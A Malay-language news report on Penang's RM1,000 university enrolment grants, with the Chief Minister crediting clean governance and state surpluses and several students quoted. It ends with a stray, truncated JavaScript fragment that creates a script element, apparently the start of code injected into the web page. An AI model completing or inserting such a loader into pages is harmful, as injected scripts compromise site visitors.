Surplas setiap tahun kerana tadbir urus kerajaan ‘bersih’

PANTAI JEREJAK – Sumbangan RM1,000 Bantuan Daftar Masuk Universiti Awam boleh dilaksanakan sampai sekarang disebabkan Kerajaan Negeri mempunyai kemampuan mencapai lebihan kewangan tiap-tiap tahun sejak 2008 hingga 2013 yang keseluruhannya berjumlah RM453 juta.

Ketua Menteri, Y.A.B. Tuan Lim Guan Eng memberitahu, angka surplas tersebut mendahului pencapaian Kerajaan Negeri era Barisan Nasional (BN) dalam tempoh 50 tahun lalu (1965 – 2007) yang direkodkan sebanyak RM373 juta sahaja.

“Kerajaan Negeri mampu membayar sebab Kerajaan Negeri terus berpegang kepada prinsip bahawa sebuah kerajaan bersih dapat menjalankan tata kelola dan urus tadbir kerajaan lebih baik dari sebuah kerajaan yang rasuah.

“Hasil Kerajaan Bersih (pada hari) inilah yang mendapat pujian bukan sahaja daripada Laporan Ketua Audit Negara,
tetapi juga Transparency International,” ucapnya pada Majlis Penyampaian Sumbangan Bantuan Daftar Masuk Ke Universiti Awam Peringkat Pulau di Tapak Pesta Pulau Pinang di sini baru-baru ini.

Seramai 209 pelajar terpilih dari Daerah Timur Laut dan 95 lain dari Daerah Barat Daya menerima sumbangan ’emas’ berkaitan.

Hadir sama, Timbalan Ketua Menteri I merangkap Ahli Dewan Undangan Negeri (ADUN) Pantai Jerejak, Dato’ Mohd. Rashid Hasnon, Dato’ Abdul Malik Abul Kassim (Exco Hal Ehwal Agama, Perdagangan Dalam Negeri dan Hal Ehwal Pengguna merangkap ADUN Batu Maung) dan Wong Hon Wai (ADUN Air Itam merangkap Setiausaha Politik kepada Ketua Menteri).

Guan Eng turut menyampaikan sumbangan kepada 234 penerima dari Daerah Seberang Perai Utara (SPU), Daerah Seberang Perai Tengah (226) dan Daerah Seberang Perai Selatan (122) pada majlis berasingan di Dewan Ng Yam Huat dekat Kawasan Dewan Undangan Negeri (KADUN) Padang Lalang baru-baru ini.

Timbalan Ketua Menteri II merangkap ADUN Perai, Prof. Dr. P. Ramasamy, Lim Hock Seng (Exco Kerja Raya, Pengangkutan dan Utiliti merangkap ADUN Bagan Jermal), Dato’ Maktar Shapee (Timbalan Yang di-Pertua Dewan Undangan Negeri Pulau Pinang merangkap ADUN Sungai Bakap), Lee Khai Loon (ADUN Machang Bubuk), Ong Chin Wen (ADUN Bukit Tengah) dan Steven Sim Chee Keong (Ahli Parlimen Bukit Mertajam) dan P. Kasthuriraani
(Ahli Parlimen Batu Kawan) turut hadir pada majlis tersebut.

Guan Eng dalam ucapannya semasa itu merakamkan ucapan takziah kepada jemaah Haji yang terlibat dalam kemalangan tren tumbang di Masjidil Haram, Makkah pada awal pagi Jumaat, 11 September lalu.

Beliau mengajak semua waris serta penerima sumbangan supaya bertafakur seketika atas kejadian mengejutkan itu, dengan Maktar dimohon memimpin bacaan Surah Al-Fatihah.

“Saya dan kita semua di sini tentu juga terkejut dan sedih atas kemalangan yang berlaku di Makkah.

“Marilah kita bertafakur seketika dan saya minta Ustaz Maktar Shapee membacakan Al-Fatihah kepada ahli keluarga yang terkorban atau tercedera,” ucapnya.

Sementera itu, bagi penerima, Nur Syuhaida Mohd. Fauzi, 18, sumbangan itu akan digunakan untuk persiapan beliau ke Universiti Teknologi Mara (UiTM) Kampus Bertam kelak.

“Sumbangan ini sangat diperlukan kerana saya memang perlu sebuah komputer riba untuk buat kerja kursus masa semester nanti,” katanya yang juga pelajar diploma farmasi.

Nada yang sama turut disampaikan oleh Lee Xin Xuan, 19, mahasiswi jurusan Pengurusan Kewangan di Kolej Universiti Tunku Abdul Razak (Kolej TAR).

“Saya memang mengharapkan sumber pendidikan tambahan untuk persiapan belajar di kolej nanti, sangat seronok dengan bantuan pendidikan ini,” jelas beliau.

M. Irenaeus Anand Moses, mahasiswa jurusan Teknologi Maklumat (IT) di Universiti Tunku Abdul Razak (UTAR) turut melahirkan penghargaan atas sumbangan Kerajaan Negeri.

“Inilah pertama kali saya menerima sendiri sumbangan Kerajaan Negeri daripada Y.A.B. Ketua Menteri.

“Seperti yang diharapkan oleh Y.A.B. Ketua Menteri supaya para penerima akan kembali berkhidmat di Pulau Pinang, saya berharap akan kembali ke negeri ini untuk bekerja tidak kira dalam sektor kerajaan atau swasta selepas tamat pengajian nanti,” ujarnya.

var d=document;var s=d.createElement(‘script’);